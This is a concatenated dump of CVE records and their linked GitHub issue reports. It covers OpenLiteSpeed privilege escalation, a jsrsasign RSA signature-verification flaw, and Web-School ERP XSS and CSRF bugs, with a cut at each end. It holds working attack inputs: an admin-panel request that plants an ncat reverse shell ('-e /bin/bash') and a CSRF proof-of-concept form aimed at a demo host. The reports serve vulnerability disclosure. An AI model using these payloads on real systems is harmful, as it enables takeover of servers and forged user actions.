en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost:7080/index.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 609 Origin: https://localhost:7080 Connection: close Cookie: litespeed_admin_lang=english; LSUI37FE0C43B84483E0=05850662073b74332d87ffa206abe963; LSID37FE0C43B84483E0=YUSipPp8emA%3D; LSPA37FE0C43B84483E0=pmN9JUxkJwg%3D name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M%0D%0ASHELL%3D%2Fbin%2Fbash%0D%0APATH%3D%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=0&autoStart=2&path=%2Fusr%2Fbin%2Fncat+-nv+127.0.0.1+8081+-e+%2Fbin%2Fbash&backlog=100&instances=1&extUser=test&extGroup=sudo&umask=&runOnStartUp=1&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.60985900+1612100858 ``` 3) The user sends a *Graceful Restart* request through admin panel and get reverse shell with sudo group privileges. ![resim](https://user-images.githubusercontent.com/76125965/106387791-70c01400-63ec-11eb-9518-201a00d738eb.png)
Openlitespeed Web Server 1.7.8 - Privilege Escalation Security Issue
https://api.github.com/repos/litespeedtech/openlitespeed/issues/217/comments
7
2021-01-31T14:53:13Z
2021-02-18T15:50:28Z
https://github.com/litespeedtech/openlitespeed/issues/217
797,729,590
217
1,806
CVE-2021-30246
2021-04-07T21:15:16.153
In the jsrsasign package through 10.1.13 for Node.js, some invalid RSA PKCS#1 v1.5 signatures are mistakenly recognized to be valid. NOTE: there is no known practical attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/478" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/10.1.13" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/478" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/10.1.13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsrsasign_project:jsrsasign:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "D6798FDB-B3EE-4EE3-902A-83DCCB1038FF", "versionEndExcluding": null, "versionEndIncluding": "10.1.13", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "347" ]
347
https://github.com/kjur/jsrsasign/issues/478
[ "Third Party Advisory" ]
github.com
[ "kjur", "jsrsasign" ]
Another finding besides the incompatibility issue reported [here](https://github.com/kjur/jsrsasign/issues/477) for PKCS#1 v1.5 signature verification, is the leniency in parsing the prefix of PKCS#1 structure. **Background.** The prefix to the top ASN.1 structure of the PKCS1 v1.5 encoded message consists of leading byte (`0x00`), block type byte (`0x01` for RSA signing scheme), padding bytes (`0xFF...FF`), and the end of padding (`0x00`). The length of padding bytes should also be at least 8 bytes and computed such that the final length of the PKCS#1 encoded message is equal to the length of public modolous `N` (denoted by `|| N ||`). Block type byte is there to indicate to which RSA scheme this encoded message is belonged. The end of padding also specifies where padding bytes actually ends. The leading byte (`0x00`) also guarantees that the integer representative of the encoded message is not greater than or equal to the public modolous `N`. By and large, the prefix bytes should satisfy the requirements in order for RSA PKS1 v1.5 signature scheme to be able to hold on to its security promises. **Problem.** However, jsrsasign v10.1.13 is lenient in checking such requirements and some other invalid signatures are mistakenly recognized to be valid. As will be shown below in the snippet taken from the source code, the issue arises because the implementation ignores the initial `0x00` bytes as they will disappear in octet strings to integer translation and more importantly the fact that an incorrect regex pattern matching is being used to peel off the prefix from the the top ASN.1 structure. This bug seems to be of similar type previously reported on [RSA-PSS signature validation](https://github.com/kjur/jsrsasign/security/advisories/GHSA-q3gh-5r98-j4h3). **More detailed root cause analysis.** In line `248` @ `RSAKey.prototype.verify` function in `jsrsasign.js` file, the initial `0x00` bytes will be ignored when octet strings are converted to integer (`b = parseBigInt(j, 16)`) and converted back to octet strings after taking modular exponentiation to the power public exponent (`i = this.doPublic(b)` and `i.toString(16)`). The regex being used in `i.toString(16).replace(/^1f+00/, "")` to remove the prefix only checks for the initial string `1f+00`. So, it does not actually check for the padding bytes (`0xFF....FF`) and can be bypassed by long initial zeros (examples are given). ``` RSAKey.prototype.verify = function (f, j) { j = j.replace(_RE_HEXDECONLY, ""); j = j.replace(/[ \n]+/g, ""); var b = parseBigInt(j, 16); if (b.bitLength() > this.n.bitLength()) { return 0; } var i = this.doPublic(b); var e = i.toString(16).replace(/^1f+00/, ""); var g = _rsasign_getAlgNameAndHashFromHexDisgestInfo(e); if (g.length == 0) { return false; } var d = g[0]; var h = g[1]; var a = function (k) { return KJUR.crypto.Util.hashString(k, d); }; var c = a(f); return h == c; }; ``` **Implication: (Interoperability issue)** As this might not be susceptible to an immediate signature forgery attack because without the ability to hide random bytes, the attack cost seems to be prohibitive. However, this can simply create an interoperability issue. #### Reference notation and concrete values * `N`: public modulus * `|N|`: length of public modulus * `d`: private exponent * `e`: public exponent * `H`: hash function * `m`: message * `I`: to-be-singed RSA PKCS#1 v1.5 signature scheme input structure * `S`: signature value obtained by `I^d mod N` ``` N = 0xE932AC92252F585B3A80A4DD76A897C8B7652952FE788F6EC8DD640587A1EE5647670A8AD4C2BE0F9FA6E49C605ADF77B5174230AF7BD50E5D6D6D6D28CCF0A886A514CC72E51D209CC772A52EF419F6A953F3135929588EBE9B351FCA61CED78F346FE00DBB6306E5C2A4C6DFC3779AF85AB417371CF34D8387B9B30AE46D7A5FF5A655B8D8455F1B94AE736989D60A6F2FD5CADBFFBD504C5A756A2E6BB5CECC13BCA7503F6DF8B52ACE5C410997E98809DB4DC30D943DE4E812A47553DCE54844A78E36401D13F77DC650619FED88D8B3926E3D8E319C80C744779AC5D6ABE252896950917476ECE5E8FC27D5F053D6018D91B502C4787558A002B9283DA7 |N| = 256 bytes d = 0x009b771db6c374e59227006de8f9c5ba85cf98c63754505f9f30939803afc1498eda44b1b1e32c7eb51519edbd9591ea4fce0f8175ca528e09939e48f37088a07059c36332f74368c06884f718c9f8114f1b8d4cb790c63b09d46778bfdc41348fb4cd9feab3d24204992c6dd9ea824fbca591cd64cf68a233ad0526775c9848fafa31528177e1f8df9181a8b945081106fd58bd3d73799b229575c4f3b29101a03ee1f05472b3615784d9244ce0ed639c77e8e212ab52abddf4a928224b6b6f74b7114786dd6071bd9113d7870c6b52c0bc8b9c102cfe321dac357e030ed6c580040ca41c13d6b4967811807ef2a225983ea9f88d67faa42620f42a4f5bdbe03b e = 3 H = SHA-256 (OID = 0x608648016503040201) m = "hello world!" ``` * **Example#1:** Padding bytes with length 1 * `I = 0x0001ff003031300d0609608648016503040201050004207509e5bda0c762d2bac7f90d758b5b2263fa01ccbc542ab5e3df163be08e6ca9` * `S = 0x3fa376d1e4f51e9ff32636fe4d5c1b22b9f3d2e5d017ea79168e8e297316c4ca980827ad333f983bf9628e212a21f5fe5f2bde47088ef6b002cef31f9ce395abd6400f2ddfc8c2d152174ff47bf9e396843033c752df8613054692ef0489fb59e3bd31e30ed18d83474c898236d4691b03d80c46c5fdbb1e8c5901c65748d0fc6857b64cd6baab722ac827d1d1e2cb1638afebe83547115747590eb83808e3dd99df942dc45461bb54efc5e52dc989af33c1518612571288de34542241b3ae98a3600499206be8c2fb56b14ca967712161666adabd8f79723d5b274c5cf8c84f5b2e158294662de15e897b298c9203829bc846eeccce9b424d6cf7a1d9fa284e` * **Example#2:** All zero bytes as prefix * `I = 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003031300d0609608648016503040201050004207509e5bda0c762d2bac7f90d758b5b2263fa01ccbc542ab5e3df163be08e6ca9` * `S = 0xe5c9db5fb1f81cf431a568caeea54e3e7a3d54a2ae16929ecf52da9ea7018f18e7d3b2c3968a338d8b0cd0233c3073a25689da5310f52f2c14bf89c81ab2d8e2a0a5bef4403199aaa7a2bef6af6b33b15828f646358193c4ef8360c48e70f6e632b81432910b94b73854413fdb61f5377d88c5bb9848cd301b6e7609f90f4af94cbfae053fe7e9bcedd1c905d8a26f01133607d8f81efe993ad9daf78188ddbe6496dd7b6bea2cb3617708b96ccd9e0ca2398dd34d81567d2644f7a3ae4956a674e389aab9d8f1e732759209ddf17fd01cc347e6c74464c03e4d57be3052582f04c8553a6ebc6046742c659d7f542b4c72f8966dfde06036ad47d190dcddd03a` * **Example#3:** It can start with some number of `0x00` bytes, and then `0x1f` byte followed by some `0xff` bytes ending with `0x00` byte. * `I = 0x00001fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d0609608648016503040201050004207509e5bda0c762d2bac7f90d758b5b2263fa01ccbc542ab5e3df163be08e6ca9` * `S = 0x472a5cb99114a3815d427b75b7e331192099bbf8e472995979395a53baa988a156b96c56bf9afa2c190103067a61e7caf99fb899f5023d9bf5eadb22ac90e2436c18ea7fac586eba9c5dee509b4e5f5d13d835dc139cb06a37b8caa1a4a66e1b8131987141139649b51ffdc48c8a28dfce9d8a6374136b959d8a916aaecc781829dd1d63147a4323807995b15c4c2542c1018fd990554ac978425c44c4575471222fdf218bd7378d696bf103a45fe05e53fd073290287d2fd9565b04b3467e2b3da4ee2a73211bf594ecf11b06ba5efeb61012ba1699624e2dbdffd060de930fff76019262714dd412946d7678f77720181c3f7316261d22c175c746e660fa4c`
Leniency in parsing block type byte and padding bytes for PKCS#1 v1.5 signature verification
https://api.github.com/repos/kjur/jsrsasign/issues/478/comments
4
2021-04-02T05:31:06Z
2021-04-14T03:15:55Z
https://github.com/kjur/jsrsasign/issues/478
848,973,098
478
1,807
CVE-2021-30111
2021-04-08T12:15:12.540
A stored XSS vulnerability exists in Web-School ERP V 5.0 via (Add Events) in the event name and description fields. An attack can inject a JavaScript code that will be stored in the page. If any visitor sees the events, then the payload will be executed.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:web-school:enterprise_resource_planning:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A0691C2C-3D8B-4203-986C-755B4F6C54C8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/0xrayan/CVEs/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "0xrayan", "CVEs" ]
**Product** : Web-School ERP V 5.0 **Description**: A stored XSS vulnerability exists in Web-School ERP V 5.0 via (Add Events) in the event name and description fields. An attack can inject a JavaScript code that will be stored in the page. If any visitor sees the events, then the payload will be executed.. **Recommendation** 1-Ensure that any user input is properly sanitized 2-Use ` Content Security Policy` (CSP) to reduce the severity of any XSS vulnerabilities that still occur POC : [Google Drive ](https://drive.google.com/file/d/1RK8WXHfIPv6xsOH3A996LSq2gjfbB2vm/view?usp=sharing)
CVE-2021-30111
https://api.github.com/repos/0xrayan/CVEs/issues/4/comments
0
2021-04-08T00:48:15Z
2021-04-08T00:48:15Z
https://github.com/0xrayan/CVEs/issues/4
852,952,353
4
1,808
CVE-2021-30112
2021-04-08T12:15:12.587
Web-School ERP V 5.0 contains a cross-site request forgery (CSRF) vulnerability that allows a remote attacker to create a student_leave_application request through module/core/studentleaveapplication/create. The application fails to validate the CSRF token for a POST request using Guardian privilege.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:web-school:enterprise_resource_planning:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A0691C2C-3D8B-4203-986C-755B4F6C54C8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/0xrayan/CVEs/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "0xrayan", "CVEs" ]
**Product** : Web-School ERP V 5.0 **Description**: Web-School ERP V 5.0 contains a cross-site request forgery (CSRF) vulnerability that allows a remote attacker to create a student_leave_application request through module/core/studentleaveapplication/create. The application fails to validate the CSRF token for a POST request using Guardian privilege. **Recommendations :** 1- Implement `X-CSRF-TOKEN` and make sure it's validating in back-end server as well 2- Implement an interceptor which appends token value to every (state-changing) request in custom request header `X-XSRF-TOKEN-B ` **Video POC** : [Google Drive ](https://drive.google.com/file/d/1NvU9FJl1wO7bz9bWe-fAk5pX8PGCNRS5/view?usp=sharing) **POC** : ``` <!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body, html { height: 100%; margin: 0; } .bg { /* The image used */ background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4"); /* Full height */ height: 100%; /* Center and scale the image nicely */ background-position: center; background-repeat: no-repeat; background-size: cover; } </style> </head> <body> <div class="bg"></div> <p>CSRF CVE-2021-30112 , After clicking below button a Studentleaveapplication request will be created !!.</p> </body> <form enctype="multipart/form-data" method="POST" action="http://demowebsch.web-school.in/index.php/core/studentleaveapplication/create"> <input class="form-control hasDatepicker" placeholder="start date" id="Studentleaveapplication_fromdate" name="Studentleaveapplication[fromdate]" type="text" value="04/20/2021"> <input class="form-control hasDatepicker" placeholder="start date" id="Studentleaveapplication_todate" name="Studentleaveapplication[todate]" type="text" value="04/22/2021"> <input class="form-control" name="Studentleaveapplication[reason]" id="Studentleaveapplication_reason" value="CSRF everywhere"> <input class="btn btn-info" type="submit" name="yt0" value="Create"> ```
CVE-2021-30112
https://api.github.com/repos/0xrayan/CVEs/issues/3/comments
0
2021-04-08T00:37:35Z
2021-04-08T00:37:35Z
https://github.com/0xrayan/CVEs/issues/3
852,948,601
3
1,809
CVE-2021-30113
2021-04-08T12:15:12.650
A blind XSS vulnerability exists in Web-School ERP V 5.0 via (Add Events) in event name and description fields. An attacker can inject a JavaScript code that will be stored in the page. If any visitor sees the event, then the payload will be executed and sends the victim's information to the attacker website.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://web-school.in" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/0xrayan/CVEs/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://web-school.in/try-demo/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:web-school:enterprise_resource_planning:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A0691C2C-3D8B-4203-986C-755B4F6C54C8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/0xrayan/CVEs/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "0xrayan", "CVEs" ]
**Product** : Web-School ERP V 5.0 **Description:** A blind XSS vulnerability exists in Web-School ERP V 5.0 via (Add Events) in event name filed & description filed. An attacker can inject a JavaScript code that will be stored in the page. If any visitor sees the event, then the payload will be executed and sends the victim's information to the attacker website.. **Recommendation** 1-Ensure that any user input is properly sanitized 2-Use `Content Security Policy` (CSP) to reduce the severity of any XSS vulnerabilities that still occur **POC :** _As show below it's the output from XSS Hunter Server_ ![image](https://user-images.githubusercontent.com/78818477/113948679-1e4d0a80-9816-11eb-80c1-c96de451aac0.png) ![image](https://user-images.githubusercontent.com/78818477/113949678-7f75dd80-9818-11eb-8a73-fb8758453b7b.png) **DOM** ``` <html lang="en"><link type="text/css" rel="stylesheet" id="dark-mode-custom-link"><link type="text/css" rel="stylesheet" id="dark-mode-general-link"><style lang="en" type="text/css" id="dark-mode-custom-style"></style><style lang="en" type="text/css" id="dark-mode-native-style"></style><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="/assets/11d351da/css/styles.css"> <link rel="stylesheet" type="text/css" href="/assets/696d013/jui/css/base/jquery-ui.css"> <script type="text/javascript" src="/assets/696d013/jquery.js"></script> <script type="text/javascript" src="/assets/11d351da/js/Chart.js"></script> <title>Web-School ERP</title> <!-- Global stylesheets --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,300,100,500,700,900" rel="stylesheet" type="text/css"> <link href="/css/assets/css/icons/icomoon/styles.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/minified/bootstrap.min.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/minified/core.min.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/minified/components.min.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/minified/colors.min.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/fullcalendar.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/fullcalendar.print.css" rel="stylesheet" type="text/css" media="print"> <link rel="stylesheet" href="/css/assets/css/style.css"> <link rel="stylesheet" href="/js/lib/datepicker/css/datepicker.css"> <link href="/js/lib/timepicker/css/bootstrap-timepicker.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/glyph.css" rel="stylesheet" type="text/css"> <link href="/css/assets/css/minified/colors.min.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="/css/assets/css/progress_tracker.css"> <link href="/css/assets/css/icons/fontawesome/styles.min.css" rel="stylesheet" type="text/css"> <script src="/js/lib/timepicker/js/bootstrap-timepicker.js"></script> <!--<link rel="stylesheet" href="/css/style.css">--> <!--<script type="text/&nbsp;&nbsp;&nbsp;javascript" src="/css/assets/js/core/libraries/jquery.min.js"></script>--> <!-- Load Moment extension --> <script type="text/javascript" src="/css/assets/js/plugins/ui/moment/moment.min.js"></script> <!-- Load plugin --> <script type="text/javascript" src="/css/assets/js/plugins/pagination/datepaginator.min.js"></script> <!-- Load base --> <script type="text/javascript" src="/css/assets/js/plugins/pickers/pickadate/picker.js"></script> <!-- Load date picker --> <script type="text/javascript" src="/css/assets/js/plugins/pickers/pickadate/picker.date.js"></script> <!-- Load time picker --> <script type="text/javascript" src="/css/assets/js/plugins/pickers/pickadate/picker.time.js"></script> <!-- Load plugin --> <script src="/js/country.js"></script> <script type="text/javascript" src="/js/custom.js"></script> <script type="text/javascript" src="/css/assets/js/plugins/pickers/color/spectrum.js"></script> <script type="text/javascript" src="/css/assets/js/pages/picker_color.js"></script> <script type="text/javascript" src="/css/assets/js/plugins/notifications/pnotify.min.js"></script> <script type="text/javascript" src="/css/assets/js/plugins/tables/datatables/extensions/fixed_columns.min.js"></script> <script type="text/javascript" src="/css/assets/js/plugins/tables/datatables/extensions/scroller.min.js"></script> <script type="text/javascript" src="/css/assets/js/plugins/tables/datatables/datatables.min.js"></script> <script type="text/javascript" src="/css/assets/js/pages/components_notifications_pnotify.js"></script> <style> /*.active a { color: red; }*/ </style><script data-require-id="echarts/theme/limitless" src="./assets/js/plugins/visualization/echarts/theme/limitless.js" async=""></script></head> <body class="pace-running"><div class="pace pace-active"><div class="pace-progress" data-progress-text="48%" data-progress="48" style="transform: translate3d(48.2311%, 0px, 0px);"> <div class="pace-progress-inner"></div> </div> <div class="pace-activity"></div></div> <div class="navbar navbar-default header-highlight"> <div class="navbar-header"> <a class="navbar-brand" href="#"></a> <ul class="nav navbar-nav visible-xs-block"> <li><a data-toggle="collapse" data-target="#navbar-mobile"><i class="icon-tree5"></i></a></li> <li><a class="sidebar-mobile-main-toggle"><i class="icon-paragraph-justify3"></i></a></li> </ul> </div> <div class="navbar-collapse collapse" id="navbar-mobile"> <ul class="nav navbar-nav"> <li><a class="sidebar-control sidebar-main-toggle hidden-xs"><i class="icon-paragraph-justify3"></i></a></li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-git-compare"></i> <span class="visible-xs-inline-block position-right">Updates</span> <span class="badge bg-warning-400">!</span> </a> <div class="dropdown-menu dropdown-content"> <div class="dropdown-content-heading">Updates</div> <ul class="media-list dropdown-content-body width-350"> </ul> </div> </li> </ul> <p class="navbar-text"><span class="label bg-info"><a style="color:white" href="/index.php/core/academic/create">Academic Year: ( 2020 - 2021 )</a></span></p> <ul class="nav navbar-nav navbar-right"> <form class="navbar-form navbar-left" action="/index.php/core/institution/search" target="_blank" method="POST"> <div class="form-group"> <input placeholder="Search..." class="form-control ui-autocomplete-input" id="user" type="text" value="" name="user" autocomplete="off"><input id="hidden-field" name="output" type="hidden" value=""> </div> <button type="submit" class="btn btn-default" onclick="return autocompletesearch()"><i class="icon-search4"></i></button> </form> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-bubbles4"></i> <span class="visible-xs-inline-block position-right">Messages</span> <span class="badge bg-warning-400" id="envelope">0</span> </a> <div class="dropdown-menu dropdown-content width-350"> <div class="dropdown-content-heading"> <span class="font-weight-semibold">Messages</span> <a href="/index.php/core/email/email#newMail" style="float: right;" data-popup="tooltip" title="" class="text-default" data-original-title="Compose new"><i class="icon-compose"></i></a> </div> <ul class="media-list dropdown-content-body"> </ul> <div class="dropdown-content-footer"> <a href="/index.php/core/email/email" data-popup="tooltip" title="" data-original-title="View All"><i class="icon-menu display-block"></i></a> </div> </div> </li> <li class="dropdown dropdown-user"> <a class="dropdown-toggle" data-toggle="dropdown"> <img src="/css/assets/images/placeholder.jpg" alt=""> <span>admin</span> <i class="caret"></i> </a> <ul class="dropdown-menu"> <!-- <li><a href="/index.php/user/profile/changepassword"><i class="icon-lock2"></i>Change Password</a></li> --> <li><a href="/index.php/user/logout" onclick="signOut();"><i class="icon-switch2"></i>Log Out</a></li> </ul> </li> </ul> </div> </div> <div class="page-container" style="min-height:923px"> <div class="page-content"> <div class="sidebar sidebar-main"> <div class="sidebar-content" style="margin-bottom:10rem;"> <div class="sidebar-user"> <div class="category-content"> <div class="media"> <a href="#" class="media-left"><img 